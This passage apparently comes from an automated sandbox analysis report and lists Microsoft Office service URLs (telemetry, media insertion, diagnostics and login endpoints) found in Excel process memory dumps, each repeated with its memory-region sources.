Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://hubble.officeapps.live.comd
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://hubble.officeapps.live.comsGraphx
Source: EXCEL.EXE, 00000000.00000002.629585579.0000000012D2D000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: EXCEL.EXE, 00000000.00000002.629522370.0000000012CF0000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: EXCEL.EXE, 00000000.00000002.629585579.0000000012D2D000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://incidents.diagnostics.office.come
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://inclient.store.office.com/gyro/clientlO
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: EXCEL.EXE, 00000000.00000002.629522370.0000000012CF0000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: EXCEL.EXE, 00000000.00000002.629522370.0000000012CF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: EXCEL.EXE, 00000000.00000002.629522370.0000000012CF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediac
Source: EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://lifecycle.office.com
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://lifecycle.office.comP
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: EXCEL.EXE, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://login.windows.local
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.localtes
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeJ
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize$
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize$GA
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize%DB
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize&EC
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize&y4
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize(
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize)t9
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize/
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize0HU
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize4x
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize5ER
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize5y
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize6JS
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize8
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize:z
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize;
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize;GP
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize?
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeAF
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeB
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeCx
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeE
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeGt
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeLD
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeLx
